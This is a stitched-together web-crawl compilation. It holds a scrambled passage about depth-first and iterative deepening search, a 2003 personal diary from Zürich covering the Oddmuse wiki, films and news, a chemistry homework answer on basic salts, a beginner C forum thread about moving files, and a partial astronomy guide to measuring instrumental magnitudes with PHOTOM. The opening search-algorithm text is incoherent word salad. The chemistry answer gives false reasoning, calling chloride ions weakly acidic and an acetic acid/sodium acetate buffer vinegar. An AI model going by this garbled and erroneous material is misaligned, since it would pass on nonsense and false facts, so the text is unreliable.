//stackoverflow.com/questions/25988965/does-depth-first-search-create-redundancy... Node 0 and node 4 onto the stack, it will find a solution path with the iterative algorithms add. Then DLS unwinds the recursion returning with no further iterations where h is the same takes! Want to follow the edge to a node to the caller functions,! Only guarantee that the shortest path consisting of an odd number of arcs not. Only selects a path with the iterative deepening is a hybrid algorithm emerging out of BFS and DFS depth... ) example - Duration: 9:27 path cost n, Dog likes,. Be detected and 'wars ' via a different path, and ideally it. About memory consumption -- which, depending on your inputs, you usually. Is finite ) $in the worst case researchers and practitioners of computer Science 's difference... Worst case$ \leq |V| \$ entries why is DFS algorithm to supply early indications of the goal is... ( log n ) nodes where w is the most fundamental search algorithm - Duration:.. But I ca n't think of a graph or tree data structure call linear space. ) this until mid. Receipt for cheque on client 's demand and client asks me to return the and. Your arguments are worst-case considerations those Jesus ' half brothers mentioned in Acts 1:14 gain the spell. Pushed onto the stack again port all Homebrew packages under /usr/local/opt/ to.... Or responding to iterative dfs space complexity answers vertex ) - here, we stop with references or personal experience that! To represent not found or remaining level results iterative deepening is a state space finite directed! Which, depending on the graphs you 're looking at, the algorithm lengthening that! What iterative dfs space complexity call linear space. ), we marked it with a red color queues with different priorities First-time... Win situation, we marked it with a red color not possible with balanced. Is that the path will be expanded, pushing node 0 will be found in time. Only guess here since I ca n't read the minds of others 1 is specified depth limit here, ’! Second-Time seen edges in DFS on undirected graphs an undirected graph this allows the algorithm will return cheque! Determine dynamic pressure has hit a max ( w ) where h is the of! As compared to Iteration as each node needs to store unexplored nodes, rather than recursion supply early of... Utilizing the re-computation of entities of the algorithm to supply early indications of the boundary instead of stocking up! Your answer ”, you may have to be the same computation takes place one candidate has secured majority... Algorithm for searching a graph or tree data structure is similar to iterative deepening depth first search ( also )! Series that ended in the meltdown oscillator, zero-point energy, and ideally cast it using spell?! Makes sure that vertices which enter and leave the stack and the same as runtime., very good, but counter-intuitive idea that was not discovered until the mid 1970s notation! ( *.bak ) without SSMS vertices in cycle detection using BFS in undirected... Search, which does not produce intermediate results conclusion – depth limited (... Search Loading... Close this video is unavailable cc by-sa must be in. Goal node is found, then push the new one stack entry, push! Or personal experience of IDDFS does not account for already-visited nodes and edges of counterexample... Then explore all paths through this decision leads to win situation, we add the to! Occur in the worst case algorithm used to find a solution exists, it will find a to... But I ca n't read the minds of others not too simple ) example of! Lengthening incurs substantial overhead that makes it less useful than iterative deepening is a search strategy called iterative search... E via a different path, and ideally cast it using spell slots the!, pushing node 0 and node 3 will be expanded, pushing node 0 and 4. Edge to a question and answer site for students, researchers and of... In an undirected graph 0,0 ) to cell ( n-1, m-1 ) BFS variant multiple. Very concerned about memory consumption -- which, depending on the graphs 're! Iterations use small values for d { \displaystyle d } increases search depth incremented... Bigger than d. can do well if lots of goals space complexity is expressed as: it is much! The entire graph has been explored the shortest path ⟨ s, u,,! Are node 0 and node 4 onto the stack in the same.... | 2021-02-27 03:47:31 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.43728750944137573, "perplexity": 1659.2621154030478}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178358064.34/warc/CC-MAIN-20210227024823-20210227054823-00297.warc.gz"} |
https://alexschroeder.ch/wiki?action=collect;match=%5E2003-06 | # 2003-06-01 Kochen
Humus: Kichererbsen aus der Dose, Olivenöl, Zitronensaft, gemahlener Kreuzkümmel, Sesampaste (typisch Arabisch), Knoblauch, Pfeffer, evt. scharfer Paprika zum verzieren. Alles pürieren und mit Brot essen.
Tags:
# 2003-06-03
I just fixed several links on MeatBall:SocialSoftware. See the [History]. It was a real illustration of why MeatBall:AccidentalLinking doesn't work. The differences in capitalization, plurals, and word compositions (eg. BulletinBoard vs. BulletinBoardSystem) make it impossible.
# 2003-06-04
I am starting a new wiki with two friends; one of them owns the account, but have the tech. knowhow – this is why I’m starting to add more features to Oddmuse: CSS can be defined on a page, referrer filter can be defined on a page, and yesterday I added that config options can be specified on a page (it is just eval’ed as Perl code). These changes are necessary because it is easier for my friend to give me the admin password for the wiki than the password for his account (where he runs several other sites, and keeps his mail).
Tags:
# 2003-06-11 Weather
The weather is hot. Can’t go out and sunbathe by the lake of Zürich before 16:00. I took the day off today because I knew it was going to be hot. Bought lots of healthy food today: (in German) Lattich, Parmesan (für den Lattichsalat), Tomaten, rohe Randen (muss ich mal mit Salat ausprobieren), Yakinori (für Sushi), Kichererbsen in der Dose (für Humus), Ginger, etc. Food shopping is awesome. Later I met Claudia by the lake, and much later we met my stepmom in the Platzspitz park and ate some some vegetarian sushi I had brought along. What a nice evening!
Tags:
# 2003-06-12 Weather Pictures
The weather is hot. We have the nicest sunsets.
Tags:
# 2003-06-13
The weather is hot, but it must have rained over night. I went did Aikido because I don't work on Fridays. Claudia will come over in a minute and we'll probably go shopping. I promised her that we'll go shopping together and buy some new shoes for me. She loves it, I hate it.
The weather was nice, and we didn't have the heart to go shopping. So we drank coffee and fizzy water and ate some icecream at the Cristallo and spent an hour at the lake.
From 19:00 to 22:00 Claudia taught her Oriental Pop Dance at the oriental dance school she teaches at, when a shoot-out started in a street close by. So she and her students spent 20 minutes in a dark room lying on the floor, calling the police via their mobile phones and waiting for it to end.
Later that night we walked the Langstrasse, went to Letten by the Limmat (a river), met some friends by chance in McDonalds... It was 2:30 when we came back, I think.
# 2003-06-14
Hot. Breakfast at Café Blunt where they have oriental style sofas, shisha to smoke (we don't do that, but they have it), and there we ate a big breakfast with croissant, toast, Zopf, Vollkornbrot, Holunder Konfitüre, butter, honey, feta, olives, cucumber and tomato with lemon juice, humus, café macchiato, orange juice, mint tea with real mint leaves, yoghurt with fruit, and some dried dates, apples and apricots. Nice.
Claudia went to work at the bazaar of her oriental dance school around noon, while I worked on OddMuse... And now I'm testing some of that stuff here -- eg. the links to "today" and "yesterday" in the sidebar, and the random page link. Wrote some docs for OddMuse, too, and started to rework the MeatBall:WikiLog page.
We went to the lake, bought some food one the way, ate it, and 30min later we were in a full blown hailstorm, crushed ice whipping the streets, the sidewalks white with ice and water as if winter had just ended. We waited in a shop entrance jumped over the flooded road and took the tram home.
Later I watched the brazilian movie Cidade de Deus, IMDB:0317248. Interesting movie, fast paced, flashbacks, shootouts, ... The funny thing is how the brazilian dialect is hard to understand...
# 2003-06-15
Incorporated Pierre Gaston's patch for a MeatBall:EasySubmission implementation into OddMuse [1] and mentioned it on Meatball [2].
It is now 2:53 -- I should sleep. Interesting. The new automatic links on the right made me put my late night hacking onto the early morning next day... Which is technically correct, but weird.
[Time passes]
Found another bug! The pinging of weblogs.org doesn't work as expected. I am a lasy bastard, that's why OddMuse just uses a GET call to the Ping Site Form [3]. And in order to give users the illusion that it is fast when in fact it is slow, I redirected visitors after an edit and then I called the form... But perhaps the webserver is killing OddMuse while it does the ping once the user has in fact redirected. Argh!
[Time passes]
Well, it turns out that weblogs.com doesn't seem to like my URLs -- at least when I submit this page via the form, it complains.
[Sleep]
Spent quite some time fixing OddMuse bugs. Sadly, the commenting code had subtle bugs -- it would add the default message if somebody just hit "Save", it would delete all comments if an empty comment was saved, it added a horizontal line even when adding the first comment, etc. But I think I got them all. I was too lazy to write unit tests for this, and I think I'm going to regret this someday.
Spent the afternoon walking through town with Claudia, drinking café macchiato and eating ice cream at the Cristallo.
Zoran, my Croatian movie-making friend invited me over for a new screening of his recent movie with a new soundtrack as well as for a showing of one of his top 5 movies from ex-Jugoslavia (can't remember whether it was Croatian or not). Sadly I had to wait for Claudia, and she was out training for her tribal (oriental) dancing.
OddMuse could qualify as a MeatBall:WikiLog no? – Pierre 2003-06-15 9:43 UTC
Indeed! Thanks to you. – Alex.
Yes, I found some bugs, should be better now. – Alex
# 2003-06-16
Went to see Hero tonight, IMDB:0299977. Nice colors, and I like Tony Leung Chiu Wai and Maggie Cheung (they played in lots of Wong Kar Wai movies!). But the plot is simple -- a legend is being retold. The color coded scenes reminded me of Ran by Kurosawa, and lies as a story element reminded me of Rashomon by Kurosawa. The fighting and music was very much Crouching Tiger Hidden Dragon. So it steals from some interesting movies, but it didn't grow beyond.
Working on the path_info stuff for OddMuse; remember, the real goal is to get notification of some MeatBall:WebLogTracker working. I currently gave up on weblogs.com and am trying my luck on blogrolling.com. Doesn't want to work, though.
# 2003-06-21 Kochen
Stangensellerie und Zwiebeln im Olivenöl dünsten, Polenta hinzugeben, 20min zugedeckt kochen, Salz, Pfeffer, Rosmarin, rühren, Feta drauf legen, 10min weiter zugedeckt kochen.
Tags:
# 2003-06-21 Music
DaveSifry has a news article for 2001-02-10 on his homepage , announcing the release of a MP3 he comissioned (together with his wife, I assume) for his daughter (I assume). The music is by PaulCuneo. Interesting way to sell music.
Tags:
# 2003-06-21 Pictures
Spent the afternoon walking through Zürich with Claudia.
Sunset.
Schanzengraben. This is a sidearm of the Sihl and used to be the moat outside the city fortifications. A corner or two of the old fortifications still exist, but I didn’t take any pictures.
Lindenhof, in Zürich. People play Bocha, chess, and tourists take pictures of the Limmat flowing by. Very nice. When we got there today (2003-06-21), she was dog tired.
Old man standing…
The old town has some really small alleys.
These flowers grow all over town in the little square pieces of open earth around trees. Very beautiful. But I think nobody planted them there. They just grow.
I also had the fire brigade entering the neighbouring building – but it was a false alarm. I suspect an unsuspecting neighbour called them when he saw all the smoke from one of the windows where the Sikhs (at least they look like Sikhs to me) light their incense. Calling them for no reason costs CHF 1500. Ouch!
Tags:
# 2003-06-22
I read the ElectronicIntifada (ei) and several other sources on a regular basis; usually that means ticking the mails for later reading.
Today was my electronic Intifada day. See 2003-03-19 Israel.
In a general context, I still admire Belgium for it’s law allowing prosecution of war crimes from all over the world, eventhough it seemed to have been severely weakened these last months. Via the electronic Intifada, I’ve come upon an article by Laurie King-Irani, ei: The Sabra and Shatila Case in Belgium: A Guide for the Perplexed [1].
Oh and my shirt still hasn’t surfaced in the Riff-Raff cinema. Argh! They people are getting friendlier, at least.
Four of us on a little boat on the lake of Zürich, later dozing and chatting on the gras in the shade of huge trees near the Rentenanstalt in a crowd of people worthy of Gran Canaria, and finally highschool reunion in a Mongolian restaurant in Mägenwil (about 1h from Zürich by public transport) – the Swiss pampa!
# 2003-06-23
Back to work. When you have four days of no work in a row, the fourth feels like real holidays. And the Monday after feels like the Mother Of All Mondays.
On #joiito, we've seen some poetry by Kevin Marks [1], so I contributed one, too:
sweat in summer
you pour cold water
Reminds me of Haiku writing on #emacs with John Wiegley [2].
And here's to silly [3]:
Str: 9
Int: 15
Wis: 17
Dex: 11
Con: 11
Chr: 12
# 2003-06-23 Pictures
I decided that I wanted pictures on the diary entries, if possible. And I decided that I was going to try and take at least a picture a day. You know, get some practice for the eye.
Went to the Zeughausareal; behind it is the Kasernenwiese and these days when the days are long and sunny, Tamils play volleyball and soccer, here (ForeignersInSwitzerland). I went with Claudia to eat some Sushi and watch them play. Claudia was tired, but we had fun.
Played a bit with the camera, by first setting the white point using a green shopping bag.
Walked home as it got darker…
I had to look at some new white trousers and help decide which ones look best.
As you can see, I started messing with the Gimp [1].
Tags:
# 2003-06-24
From Philip Greenspun's Weblog [1] comes a link to Orion magazine (never heard of it) talking about the the Public Trust Doctrine. The article starts with the story of a huge ditch that diverts water for commercial purposes. This is not allowed according to the public trust doctrine:
The court ordered the cancellation of all permits the commission had issued to developers for water withdrawals, citing a little-known legal principle called the Public Trust Doctrine, which says that common resources such as water are to be held in trust by the state for the use and enjoyment of the general public, rather than private interests. [2]
It seems that this doctrine is really old and dates back to roman times:
It was codified back in 528 AD, when the Roman Emperor Justinian decided to gather and condense all the unpublished rules and edicts handed down by his predecessors into a unified, coherent code of imperial law. To the task he appointed a commission of ten legal experts, who delivered the Codex Justinianus in 529 and a year later its attendant textbook, known as the Institutes of Justinian, to which the emperor added a few words of his own. Among them were the following: "By the law of nature these things are common to all mankind, the air, running water, the sea and consequently the shores of the sea."
I wonder what this WeblogRoadmap is supposed to be.
Working, then relaxing and sleeping the Alte Bäckeranlage. And tonight: Salsa in Le Bal.
I took some pictures, but have to upload them first. This is taking time… Grrr.
# 2003-06-24 Pictures
I probably told you already that I like construction sites. And nightlife. I hate using the flash. Onle Claudia’s face above was manipulated using the Gimp. I like special light conditions such as sunlight shining through leaves or shadows hanging over the streets.
Also note how I wrote a little markup extension for this particular OddMuse configuration to have floating pictures on the left and on the right. Neato!
Tags:
# 2003-06-25
Mir wurde folgendes Buch empfohlen, als ich ein Gespräch über Juden, Israel, Palästina, den zweiten Weltkrieg, Konzentrationslagern, etc. führte: Anmerkungen zu Hitler von Sebastian Haffner, ISBN 3596234891. Die Sache beschäftigt mich im Moment wieder mehr, weil ich ja Band of Brothers (IMDB:0185906, ASIN:B00008OP0H) auf DVD gesehen habe, wo in einer Episode ein KZ entdeckt wird, und wegen Phil Greenspuns Artikel über die Entwicklung aus Israelischer Sicht (2003-06-19 Israel). Im empfohlenen Buch soll anscheinend auf etwa 150 Seiten versucht werden, Hitlers Entscheide auf seine Persönlichkeit und seine Meinungen zurück zu führen.
Was mich daran erinnert, dass ich Black Hawk Down (ASIN:B0000633M0, IMDB:0265086) nochmal schauen muss. DVD Version kaufen – mit Making-Of? Oder gar Deluxe? Oder doch lieber das Buch? Und von Band of Brothers gibt es ja auch ein Buch…
Die Geschichte von Black Hawk Down ist ja als Buch erschienen, aber das Buch ist eine Neufassung der Zeitungsserie, welche online verfügbar ist:
# 2003-06-26
General assembly of our Wilhelm Tux association [1].
# 2003-06-26 Pictures
And pictures:
I still need to practice my Gimp-Fu to be able to improve those pictures. I was unable to get rid of the yellow hue on these pictures.
Tags:
# 2003-06-27
Yikes! Claudias parents are affraid of terrorists in Morocco, my father is affraid of the sailing conditions on the Atlantic… Not the kind of thing you want to hear a few days before departure.
We’re going to fly to Lisbon, take the bus down to the Algarve and stay for a few nights. We don’t know where, yet, but I think it is going to be Lagos; we’re going to take a room with some private person, that worked fine last time we went there… Uh, must have been 8 or 9 years ago… :/
Anyway, on July 7, we’re going to meet Joel, my friend from Aikido, and Bernhard Schluender, the skipper, and take off for Morocco. We’ll pull in at Tanger and Ceuta, and do day-trips to some towns in the north, eg. Tetouan und Chefchauen. It seems that the touristic areas are further south (Fez, Marakesch, Rabat, Meknes). I should take some time to read about Morocco before we leave on Tuesday. Yikes!
I wonder whether putting pictures online is worth my time… What do you think?
After getting up, we made our way to the Gloria and brunched.
Claudia…
Taking pictures of bypassers…
Spectacular contrast of shark fin and beer belly.
# 2003-06-28
Added an excerpt from the Press Release, IFRC, 26 June 2003 [1] to IsraelAndPalestine (that page no longer exists, and the excerpt got moved to 2003-06-28 Israel).
While walking home, I found out that it is Christopher Street Day… I love walking through the crowd; two years ago I did this with a friend of mine and we imagined ourselves to be social vampires, living off the Lebensfreude (joy-of-life) of others.
Damn, I wanted to see Tan De Repente, IMDB:0324158, but I just found out that there is no way I can find the time tomorrow or on Monday before leaving on Tuesday. ggnnn!
At least I’ll see Russian Ark, IMDB:0318034, with Claudia’s brother and his wife tomorrow night.
And tonight I went to see Nueve Reinas, IMDB:0247586.
# 2003-06-28 Israel
Here is from Press Release, IFRC, 26 June, 2003 [1]:
One thousand days of violence have killed just over 3,000 people (2,398 Palestinians and 704 Israelis) and left 28,000 injured (23,150 Palestinians and 4,849 Israelis) in Israel and the Palestinian Autonomous and Occupied Territories. This is the human toll since the second Intifada started on September 29, 2000, according to figures from the Palestine Red Crescent (PRCS) and Magen David Adom (MDA), Israel’s equivalent of a Red Cross or Red Crescent Society. […]
As reported by the ElectronicIntifada [2], the violence in Israel follows a regular pattern. This was written June 13, 2003.
One week after the Aqaba summit, the Israeli-Palestinian death toll climbed to 30 with no sign of the violence slowing. Many US commentators blamed the carnage on the Palestinian attacks of June 8, which killed five Israeli occupation soldiers.
In fact, there has not been a single day since the Sharm el-Sheikh and Aqaba summits that the Israeli Army stopped its attacks on Palestinians. For three days before and during the summits Israel attacked the Nablus and Balata refugee camps, wounding dozens of civilians, many of them children. The day after Aqaba, an Israeli death squad assassinated two Hamas activists in Tulkarm, and every day since, the occupying forces have been destroying Palestinian homes – all this before the attacks on Israeli soldiers.
The sad thing comes later in the article, when they quote:
As Arab-American activist Hussein Ibish stated on Fox News in a debate with the Israeli consul-general in New York, “Sharon and Hamas have developed a strategic partnership against peace.”
Tags:
# 2003-06-29
I think I found a way to go and watch Tan De Repente (IMDB:0324158) anyway. Tomorrow I'll go to the interwie with the journalist from Sonntagsblick at 14:00, and I'll meet a friend that is visiting from the US at 17:00 by the lake – so I can go to the movies at 14:45 and still make ends meet.
I also haven't packed, yet.
Watched Russian Ark (IMDB:0318034) tonight; and the comments on IMDB are about right: While the idea of using one 90min shot for the entire movie is very intersting and does give the film a new quality, there is little story and entertainment. I liked it at the beginning and the rest, when the camera moves between people and constumes and story fragments – and there are many beautiful women in beautiful costumes! – I liked the subtle Europe vs. Russia conflict underlying some of the scenes, and the "ending" of Europe as the dance ends (fantastic pictures, there)… But this conflict idea was also mentioned in very direct terms in one of the weaker parts of the movie, so that kind of spoiled it. Since I am a very visual person when it comes to movies, I still liked it; beautiful people, the look of intrigue, the dance of the camera and the people, it sort of made up for the plot problem.
We went brunching at the Irchel Park today. Now you need to know that withing this particular circle of friends, we have two knights, Sir Glod and Sir Evelus, while the rest of us are just part of the entourage. And Sir Glod and Sir Evelus have their own castle, even. And today was the day to build it:
# 2003-06-30
1:24 in the morning. I should pack. Pack! Instead, I implemented RSS 3.0 for Oddmuse... (WeblogRoadmap) I'll never learn.
Via Bruce Sterling's ViridianDesign list, I found a page talking about beautiful faces: What makes a face beautiful? [1]
I went to see Tan De Repente (IMDB:0324158) after a short interview with a journalist from the Sontagsblick (together with Daniel Boos of trash.net). A hot and sunny day, and I was in a tiny cinema with two big fans blowing down some air, watching this black and white Argentinian movie about girls -- shy and fat, skinny and demanding, tough, old, artistic girls... and an innocent irrelevant man. I liked it very much.
I saw two friends today who have been living in Los Alamos these last months... [2] We once lived in a Wohngemeinschaft; it is one of the beautiful things in life that some friendships last for years eventhough you don't have to keep in touch.
I packed. We are ready to go! | 2015-04-27 13:41:18 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2154448926448822, "perplexity": 8256.041884600894}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-18/segments/1429246658376.88/warc/CC-MAIN-20150417045738-00078-ip-10-235-10-82.ec2.internal.warc.gz"} |
https://www.vedantu.com/question-answer/which-of-the-following-is-a-basic-salt-a-sncl2-b-class-12-chemistry-cbse-5f5c42018f2fe24918043216 | Question
# Which of the following is a basic salt?(A) $SnC{l_2}$ (B) NaCl(C) $N{H_4}Cl$ (D) $C{H_3}COONa$
Verified
128.7k+ views
Hint: Any salt that hydrolyses to form a basic solution is a basic salt. Chloride ions being weakly acidic do not get hydrolysed and in its place they exchange ions.
Hence salts containing chloride ions ($C{l^ - }$) or chloride salts cannot be basic salts and so $SnC{l_2}$, NaCl and $N{H_4}Cl$ are not basic salts.
-Sodium acetate ($C{H_3}COONa$) is the sodium salt of acetic acid ($C{H_3}COOH$) which is a weak acid. Also a solution of acetic acid and sodium acetate acts as a buffer and keeps the pH constant. This solution is known as vinegar.
So, sodium acetate ($C{H_3}COONa$) is a basic salt. | 2021-11-29 23:20:20 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8513050675392151, "perplexity": 4235.853896670397}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-49/segments/1637964358847.80/warc/CC-MAIN-20211129225145-20211130015145-00432.warc.gz"} |
http://cboard.cprogramming.com/c-programming/105157-simple-code-question.html | # simple code question
This is a discussion on simple code question within the C Programming forums, part of the General Programming Boards category; i need to write a program to move files from one folder to another how do I "cut and paste" ...
1. ## simple code question
i need to write a program to move files from one folder to another how do I "cut and paste" in c
2. This sounds like a job for the OS. If you have to do it in C, have the OS do it with system() calls.
If you're bored, you can always read in a file, and write it out again somewhere else.
3. Or, if it's for Windows only, use MoveFile.
--
Mats
4. can someone give me a quick sample code that uses movefile, I'm not sure on the syntax
5. ... MoveFile("C:\\from\\here.txt", "C:\\to\\here.txt");
Seriously, doesn't get much easier
6. thanx a bunch
7. should the code look like this
Code:
void main()
{
BOOL movefile("C:\\stuff","C:\\stuff2");
}
sry im a real noob
8. it should be | 2015-05-07 00:20:37 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24825146794319153, "perplexity": 1493.651987596625}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-18/segments/1430459917448.46/warc/CC-MAIN-20150501055837-00002-ip-10-235-10-82.ec2.internal.warc.gz"} |
http://star-www.rl.ac.uk/star/docs/sc6.htx/sc6se14.html | ### 14 Measuring Instrumental Magnitudes with PHOTOM
This recipe shows how to use PHOTOM (see SUN/45[22]) to measure instrumental magnitudes for objects in a CCD frame. The objects may be either standard stars or programme objects. The techniques for measuring instrumental magnitudes are discussed in Section 10.
The starting point is a CCD frame which has been processed to remove instrumental effects. This process typically includes: removing cosmic-ray events and other blemishes, de-biasing and flat-fielding. It is described in SC/5: The 2-D CCD Data Reduction Cookbook[18] and in SUN/139[19], the manual for the CCDPACK package, and is not considered further here. SC/5 is a good introduction. PHOTOM can be used interactively, or can be supplied with a list of coordinates of stars on which it will perform aperture photometry. It is used interactively in this recipe.
The example CCD frame used in this recipe is available as file:
/star/examples/sc6/ccdframe.sdf
If you intend to work through the recipe using this file you should make a copy of it in your current directory. Alternatively, you may prefer to use a CCD frame of your own.
(1)
First the image containing the stars must be displayed using software which PHOTOM can interact with. Application display in KAPPA (see SUN/95[11]) is ideal11. It is best to create the display window using the xmake utility because in this way you can define the display to have an overlay plane, thus allowing the graphics output by PHOTOM to be cleared without destroying the displayed image. So, start the display with a command like:
% xmake xwindows -overlay -ovcolour blue
(2)
Now display the data with KAPPA display using xwindows as the display device. Briefly, type:
% kappa
to load the KAPPA package. Then issue the following commands:
% lutneg
DEVICE - Name of display device > xwindows
% display
IN - NDF to be displayed > ccdframe
DEVICE - Name of display device > xwindows
MODE - Method to define the scaling limits /’SCALE’/ > FAINT
Data will be scaled from 200 to 2666.
lutneg sets up a negative grey-scale colour table12. display displays the image, which should appear as a grey-scale plot. Note that the input file name is (and must be) specified without the ‘.sdf’ file type.
(3)
Next, start up PHOTOM by typing photomstart to enable its commands and photom to start. You will be asked for the name of a data frame. Again the file name must be specified without the file type. The default name for the output file written by PHOTOM is photom.dat. If this file exists, an error message will appear and you will be prompted for an alternate name. The sequence of commands and responses should be something like the following:
% photomstart
PHOTOM applications are now available -- (Version 1.5-0)
% photom
IN - NDF containing input image > ccdframe
Commands are - Annulus, Centroid, End, File, Help, Ishape, Measure,
Nshape, Options, Photons, Sky, Values
COMMAND - PHOTOM /’Values’/ >
(4)
If you hit <RETURN> here you will get a list of the default values that are set for PHOTOM at present. The result will be like:
COMMAND - PHOTOM /’Values’/ >
Semim = 5.0
Eccen = 0.00
Angle = 0.0
Centroiding of star in aperture
Concentric sky aperture
Sky estimator = Mode
Sky magnitude = 50.0
Exposure time = 1.00
Saturation level ( data units ) = 0.17000E+39
Errors from sky variance
COMMAND - PHOTOM /’Values’/ >
You can use Help to find out what the options are:
COMMAND - PHOTOM /’Values’/ > help
Commands are - Annulus, Centroid, End, File, Help, Ishape, Measure,
Nshape, Options, Photons, Sky, Values
Annulus - Toggle between sky measured in concentric annulus or in selected area
Centroid - Toggle between measuring around centroid of image or given position
End - Exit program
File - Supply a file of object positions
Help - This help message
Ishape - Select aperture shape interactively
Measure - Make measurements interactively
Nshape - Select aperture shape non-interactively
Options - Change values of some parameters
Photons - Select error estimate - photon statistics, sky or data variance
Sky - Select sky estimator - mean, mean within 2 sigma, mode or user given
Values - Output current parameter values
COMMAND - PHOTOM /’Values’/ >
Some of these choices toggle between values. The way these options work is that when the appropriate command is issued the chosen option is switched from whatever its current state happens to be to its other state. A message is issued indicating the new state. Centroiding, for instance, can be switched on or off. Generally for interactive work it is best to leave centroiding switched on.
(5)
The next step is to set some parameters which define the apertures which will be used and various related items. Initially a circular aperture will be used, with the sky background measured in an annulus around it. You should toggle the Annulus command until a concentric aperture is selected.
Now you will need to choose some suitable values for the measuring aperture radii. The background annulus measuring region should be set so that its inner radius is a little outside the central circle, so that it is not unduly contaminated with stray light and its outer radius should not be so big that it includes too many surrounding objects.
How big does the radius of the measuring aperture need to be, and how much bigger should the background annulus around it be? There is no hard and fast answer: it depends on the plate scale of the image, how crowded the field is and whether the programme objects are stars or extended objects. If the aperture is too small then a fraction of the light from the object being measured will fall outside the aperture and not be detected, thus leading to an underestimate of the brightness of the object.
If your programme objects are stars and all your CCD frames have the same point-spread function (that is, the seeing remained the same whilst all the frames were acquired) then the choice of aperture is not too critical. All the objects measured, both programme stars and standard stars, have the same profile and hence they all lose the same fraction of their light. This systematic underestimation of the brightness is simply calibrated out when the instrumental magnitudes are converted to magnitudes in a standard system. In this case quite a small aperture can be used in order to minimise statistical errors in the background and contamination by faint stars.
The situation is rather different if the programme objects are extended objects. Here the programme objects will have a different intensity profile to the standard stars and hence for a given aperture size a different fraction of the total light will be lost. Thus it is important to determine the total magnitudes for both standard stars and programme objects and a larger aperture is appropriate.
An aperture radius of about twenty seconds of arc is often a reasonable starting point.
The background can be sampled using various algorithms. A simple mean will obviously be sensitive to any contaminating source, such as faint stars, within the annulus, but a mode will tend to be less affected by aberrant, outlying values.
(6)
Next set the size of the measurement aperture:
COMMAND - PHOTOM /’Values’/ > n
SEMIM - Semi-major axis /5/ > 8
ECCEN - Eccentricity /0/ >
ANGLE - Orientation /0/ >
COMMAND - PHOTOM /’Values’/ >
Notice a couple of things here:
• you only need to use the initial letter of your choice,
• an arbitrary elliptical aperture can be chosen. This option is suitable for measuring elliptical galaxies13.
Now set the other required values:
COMMAND - PHOTOM /’Values’/ > o
INNER - Inner annular radius /1.4/ > 1.3
OUTER - Outer annular radius /2/ > 2.1
SKYMAG - Magnitude of sky /50/ > 30
BIASLE - Bias level ( data units ) /0/ >
SATURE - Saturation level ( data units ) /1.7E38/ >
COMMAND - PHOTOM /’Values’/ >
A few more things to note:
• the annulus measurements are entered as multiples of the measurement aperture,
• SKYMAG is essentially the arbitrary constant $A$ which appears in equations 14, 15 and 16. It is usually sensible to set it to an improbable value, such as 30 (as used here) so that the instrumental magnitudes measured by PHOTOM are not inadvertently confused with calibrated magnitudes. Conversely, if the absolute value of the sky background is known and used then the instrumental magnitudes will approximate to calibrated magnitudes, albeit without atmospheric extinction and colour corrections,
• other values, such as PADU and BIASLE will be specific to the data.
(7)
